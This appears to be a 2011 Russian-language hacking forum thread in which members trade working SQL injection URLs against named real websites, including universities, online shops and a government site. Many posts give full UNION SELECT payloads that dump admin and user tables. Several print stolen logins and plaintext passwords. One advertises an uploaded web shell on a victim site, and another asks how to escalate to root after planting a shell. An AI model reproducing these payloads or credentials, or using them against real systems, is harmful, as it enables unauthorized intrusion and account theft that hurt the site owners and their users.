RE: Ваши Sql-инъекции
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Ваши Sql-инъекции - 2011-01-25 00:50:15.090000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.qau.edu.ye/sub_ar.php?s_id=-83+union+select+1,version(),3,4,5,6,7,8,9--
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-01-25 01:00:11.260000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.mbc.edu/news/r_detail.php?id=-2466+union+select+version(),2,3,4,5,6,7,8--
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-01-25 14:44:14.320000
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
http://www.liteaid.com/products.php?id=-1+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+information_schema.tables+WHERE+table_schema=0x6C697465616964
Онлайн магазин, есть интересные таблички но вывести не смог
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-01-25 18:29:58.736666
|
|
|
fake_magent
Сообщений: 187
Оценки: 0
Присоединился: 2010-12-19 18:43:29.280000
|
quote:
ORIGINAL: GaMeSTeR001
http://www.liteaid.com/products.php?id=-1+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+information_schema.tables+WHERE+table_schema=0x6C697465616964
Онлайн магазин, есть интересные таблички но вывести не смог
quote:
http://www.liteaid.com/products.php?id=-1+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+information_schema.tables+WHERE+table_schema=0x6C697465616964
там всё элементарно
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-01-25 18:34:13.740000
|
|
|
fake_magent
Сообщений: 187
Оценки: 0
Присоединился: 2010-12-19 18:43:29.280000
|
quote:
ORIGINAL: sepo
http://www.sonc.org/newsonc/newDesign/calendar/calendar.php?mode=detail&id=-4577+union+select+1,version(),3,4,5,6,7,8,9,10--
4 ветка, никак не смог раскурить…. кто сможет отпишите в ЛС
ты таблицы сбрутить не смог?
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-01-26 14:49:29.620000
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
quote:
ORIGINAL: fake_magent
quote:
ORIGINAL: GaMeSTeR001
http://www.liteaid.com/products.php?id=-1+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+information_schema.tables+WHERE+table_schema=0x6C697465616964
Онлайн магазин, есть интересные таблички но вывести не смог
quote:
http://www.liteaid.com/products.php?id=-1+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+information_schema.tables+WHERE+table_schema=0x6C697465616964
там всё элементарно
Ну ты попробуй выведи
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-01-26 16:15:07.453333
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
Выводит все замечательно:)
www.liteaid.com/products.php?id=-1+uNIOn+SElECt+1,group_concat(adminemail,0x3a,adminid,0x3a,username,0x3a,password,0x0b),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+mlm_administrator–+
info@liteaid.com:1:liteaid:mlbi2elm4lbtw
узеров нет в базе
www.liteaid.com/products.php?id=-1+uNIOn+SElECt+1,group_concat(table_name,0x0b),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+information_schema.tables+where+table_schema=0x6c697465616964–+
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-01-26 16:42:37.253333
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
у меня не че не получалось
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-01-27 12:43:35.063333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
quote:
ORIGINAL: fake_magent
quote:
ORIGINAL: sepo
http://www.sonc.org/newsonc/newDesign/calendar/calendar.php?mode=detail&id=-4577+union+select+1,version(),3,4,5,6,7,8,9,10--
4 ветка, никак не смог раскурить…. кто сможет отпишите в ЛС
ты таблицы сбрутить не смог?
Всё перепробовал… ни одной таблицы…
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-02-07 22:45:48.016666
|
|
|
vladimir1988
Сообщений: 5
Оценки: 0
Присоединился: 2010-12-23 15:57:31.050000
|
подскажите кто-нибудь можно что-нибудь достать с этого сайта
http://jobinweb.ru/resumes.php?orderdesc=&supercat=&city=2&cat=&searchtext=&orderby=crtime
подставляю строку "+UNION+SELECT+id+FROM+resumes+ORDER+BY+1+%20+" после orderby=crtime, вылазиет ошибка
ошибка 55: SELECT DATE_FORMAT(ts,'%d.%m.%y %H:%i') AS crtime,resumes.spec,resumes.id,resumes.gorod,resumes.bablo, wtypes.name as cat, red, hot, bold FROM resumes left join wtypes on subcatid=wtypes.id , goroda WHERE enabled=1 AND gorod=goroda.name AND goroda.id='2' ORDER BY hot desc, crtime UNION SELECT id FROM resumes ORDER BY 1 DESC LIMIT 1000
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-02-12 08:30:31.216666
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
http://www.mastmotorsports.com/2010/product-view.php?cat=Hot%20Rod%20Muscle%20Car%20Handbuilt%20N/A&id='+UNION+SELECT+1,2,3,4,group_concat(user,0x3B,pword+SEPARATOR+0x0b),6,7,8,9+FROM+nwqq461s_mastcontent.usrs+--+
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-02-12 08:50:13.520000
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
quote:
ORIGINAL: vladimir1988
подскажите кто-нибудь можно что-нибудь достать с этого сайта
http://jobinweb.ru/resumes.php?orderdesc=&supercat=&city=2&cat=&searchtext=&orderby=crtime
подставляю строку "+UNION+SELECT+id+FROM+resumes+ORDER+BY+1+%20+" после orderby=crtime, вылазиет ошибка
ошибка 55: SELECT DATE_FORMAT(ts,'%d.%m.%y %H:%i') AS crtime,resumes.spec,resumes.id,resumes.gorod,resumes.bablo, wtypes.name as cat, red, hot, bold FROM resumes left join wtypes on subcatid=wtypes.id , goroda WHERE enabled=1 AND gorod=goroda.name AND goroda.id='2' ORDER BY hot desc, crtime UNION SELECT id FROM resumes ORDER BY 1 DESC LIMIT 1000
Не хорошо рашенские сайты ломать, полно забугорных
Но все равно помогу, дальше сам
http://jobinweb.ru/resumes.php?orderdesc=&supercat=&city=-1'+and+1=0+UNION+SELECT+1,group_concat(schema_name+SEPARATOR+0x0b),3+FROM+information_schema.schemata+--+&cat=&searchtext=asdasd&orderby=crtime От ++ не откажусь
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-02-12 11:20:12.520000
|
|
|
vladimir1988
Сообщений: 5
Оценки: 0
Присоединился: 2010-12-23 15:57:31.050000
|
Спасибо GaMeSTeR001. Узнал, что мне нужно было
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-02-12 13:36:48.223333
|
|
|
Lord Reigan
Сообщений: 50
Оценки: 0
Присоединился: 2011-01-02 10:30:12.280000
|
помогите http://www.sbbs.ru/news/index.php?razdel=-1+union+select+1,2,3–
Database error: Invalid SQL: SELECT * FROM news WHERE id=
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1)
Session halted.
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-02-12 14:09:35.486666
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
http://futurisjourney.com/product-view.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,group_concat(schema_name+SEPARATOR+0x0b),9,10,11,12,13+FROM+information_schema.schemata
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-02-12 14:20:19.733333
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
quote:
ORIGINAL: Lord Reigan
помогите http://www.sbbs.ru/news/index.php?razdel=-1+union+select+1,2,3–
Database error: Invalid SQL: SELECT * FROM news WHERE id=
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1)
Session halted.
Там без запроса аналогичную ошибку выдаёт
Но есть скуля в другом месте, сайт весь дырявый и не рабочий, вряд ли что-то выведеш
http://www.sbbs.ru/news/index.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-02-12 14:29:40.790000
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
http://www.e-servicemanuals.com/product-view.php?prod_id=-1+UNION+SELECT+1,2,3,4,group_concat(table_name+SEPARATOR+0x0b),6,7,8,9,10,11,12+FROM+information_schema.tables+WHERE+table_schema=0x6462323237343934373630
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-02-12 14:51:52.276666
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
http://www.expressgiftservice.com/product-view.php?productID=-1+UNION+SELECT+group_concat(table_name+SEPARATOR+0x0b),2,3+FROM+information_schema.tables+WHERE+table_schema=0x6462313737383435313632 shop
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-02-13 23:10:26.766666
|
|
|
kazin8
Сообщений: 1
Оценки: 0
Присоединился: 2011-02-13 23:09:07.943333
|
Всем привет. Ребят, тут такой вопрос. есть некая форма авторизации, которая при введение 1' or 1=1/* в поле логин ругается вот таким матом:
Bad query: SELECT id, login, pass, status FROM 13_users13 WHERE login='1' or 1=1–'
Как я понимаю, он вытаскивает поля по определенному условию, в виде логина. Из этого смог извлечь только реальный логин админа. Ну и имена таблицы и полей. А как получить что-то большее? Обход авторизации например?
Заранее благодарю.
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-02-14 00:35:30.020000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
quote:
ORIGINAL: kazin8
Всем привет. Ребят, тут такой вопрос. есть некая форма авторизации, которая при введение 1' or 1=1/* в поле логин ругается вот таким матом:
Bad query: SELECT id, login, pass, status FROM 13_users13 WHERE login='1' or 1=1–'
Как я понимаю, он вытаскивает поля по определенному условию, в виде логина. Из этого смог извлечь только реальный логин админа. Ну и имена таблицы и полей. А как получить что-то большее? Обход авторизации например?
Заранее благодарю.
ссылку в студию…
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-02-14 15:01:53.946666
|
|
|
miha969696
Сообщений: 1
Оценки: 0
Присоединился: 2011-02-03 08:58:10.226666
|
Кто знает,объясните пожалуйста как повысить прова до рута .И можно вобще.
Шелл уже залит через админку.
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-02-14 15:34:44.186666
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
http://www.wamdistributors.com.au/product/view.php?product_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(table_name+SEPARATOR+0x0b),14,15,16,17,18,19,20,21,22+FROM+information_schema.tables+WHERE+table_schema=0x7072696D617279+--+
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-02-16 13:56:12.886666
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
http://russianst.com/link/listlink.php?category_id=-33+uniOn+seleCt+1,2,group_concat(ID,0x3a,login,0x3a,PASSWORD,0x3a,email,0x0b),4,5,6,7+from+hostgkwf_russianst.AUSER–
как шифруют пароли Х поймёшь!!!!!ни один не вскрылся[&:]
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-02-26 11:46:01.026666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.dke.org/site/events/event.php&id=-26+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16--
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-03-08 03:33:11.596666
|
|
|
Fild3y
Сообщений: 210
Оценки: 0
Присоединился: 2011-01-23 01:51:53.716666
|
http://www.developdontdestroy.org/php/latestnews_Linked.php?id=-1+union+select+1,2,version(),4
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-03-11 17:52:26.816666
|
|
|
Fild3y
Сообщений: 210
Оценки: 0
Присоединился: 2011-01-23 01:51:53.716666
|
http://www.kusuri.co.uk/shopping.php?class_id=56'
Крутите сами)
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-03-11 22:13:12.086666
|
|
|
Fild3y
Сообщений: 210
Оценки: 0
Присоединился: 2011-01-23 01:51:53.716666
|
http://passionfitnesswear.com/ShoppingOnlineViewProduct.php?id_set=-1+union+select+1,group_concat(User,0x3b,Pass),3,4,5,6,7,8,9,10+from+login http://passionfitnesswear.com/panel <— админка)
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-03-14 15:35:20.706666
|
|
|
Fild3y
Сообщений: 210
Оценки: 0
Присоединился: 2011-01-23 01:51:53.716666
|
http://idm.com.np/newsdetail.php?id=-1+union+select+1,group_concat(username,0x3b,password),3,4,5,6+from+mytbladminlogin
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-1+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3b,password),10,11+from+tbladmin
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-03-15 20:05:27.946666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.bibliotecadafloresta.ac.gov.br/index.php?&option=com_mytube&ItemId=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-03-15 22:48:10.310000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
…….
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-03-15 22:49:28.656666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.nutella.be/print_recette.php?id=46+and+1=0+Union+Select+1,concat_ws%280x3a,@@version,user%28%29,database%28%29,@@version_compile_os%29,0x494E43,4,5,6,7,8-- Server:Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Version:5.0.51a-24+lenny4-log
Powered by:PHP/5.2.6-1+lenny9
Database: nutella_be , nutella
User: nutella@localhost
http://www.nutella.be/print_recette.php?id=46+and+1=0+Union+Select+1,concat_ws%280x3a,login,password%29,0x494E43,4,5,6,7,8+From+admin-- Database : nutella_be
Table : admin
login,password
david:david
nicolas:b4t41ll3
ferrero:ferrero
http://www.nutella.be/phpmyadmin/
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-03-17 10:26:38.770000
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.berettaspeed.com/information/view_article.php?id=-15+union+select+1,version(),3,4,5,6,7,8--&action=print
http://medicineoflaughter.7h.com/articles/view_article.php?id=-15'+UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--+
http://www.daytonbulldawgshockey.com/view_article.php?id=-15+union+select+1,2,version(),4,5,6,7,8--
http://www.marketingforyourbusiness.com/view_article.php?id=-15'+union+select+1,version(),3,4,5,6--+
ver >5
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-03-22 16:25:35.803333
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
[link=http://www.smallp.hk/order.php?id=-1+union+select+concat_ws%280x3a,name,password,email%29+from+LUM_User+limit+0,1--]http://www.smallp.hk/order.php?id=-1+union+select+concat_ws(0x3a,name,password,email)+from+LUM_User+limit+0,1--[/link] и
[link=http://www.blackandwhiteplus.co.uk/bawp/order.php?from=blackandwhite&id=-1+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables+limit+1,1--]http://www.blackandwhiteplus.co.uk/bawp/order.php?from=blackandwhite&id=-1+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables+limit+1,1--[/link] - недокрученая, интересных таблиц не нашел (их 59 штук).
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-03-23 12:46:25.096666
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
SEX-SHOP!!!!Паа-русскиии!!!!!:D
http://www.xmarket.ru/production.php?ind=-37+union+select+user()+from+mysql.user–!!!
админки нет и не ищите…:)при желании можно спокойно залить шелл,мой например,тут—–>
http://xmarket.ru/upload/images/00000777.php запись в любую директорию:D
http://www.kisan.com.ua/g.php?id=-1+union+select+1,group_concat(login,0x3a,pass,0x3a,mail,0x0b)+from+user+–
4277 узера+пароли в чистом виде
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-03-23 13:55:26.316666
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
КрИпТоЗоОлОгИя[&:]
http://www.cryptozoology.com/glossary/glossary_topic.php?id=-23+union+select+1,fi_profile_password,fi_profile_login,4,count(*),6,7,8,9+from+cryptozo_db.ctable_profile–+ 21523 пользователя пароли в открытом виде :) group_concat,concat,concat_ws не работают(havij выводит отлично+~каждый 25 пароль совпадает с пароляем;) isq);) вход http://www.cryptozoology.com/forum/forum.php
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-03-24 20:44:17.936666
|
|
|
Angel12
Сообщений: 32
Оценки: 0
Присоединился: 2009-11-02 19:02:18.203333
|
http://users.unimi.it/discanti/personale/scheda.php?id_utente=-106 and 1=0 union all select 1,2,3,concat_ws(0x3a,password,username,email),5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20 from db_discanti.utenti limit 0,1 –
Google PR: 8
admin2019:admin:
Всего 82 юзера. Пароли в открытом виде.
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-03-25 02:20:10.923333
|
|
|
Fild3y
Сообщений: 210
Оценки: 0
Присоединился: 2011-01-23 01:51:53.716666
|
http://fishband.ru/klad_details.php?klad_id=1+order+by+1+--+
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-03-26 09:42:25.413333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.arwauniversity.org/sub_ar.php?s_id=-134+union+select+1,version(),3,4,5,6,7,8,9--
|
|
|
|
|
|
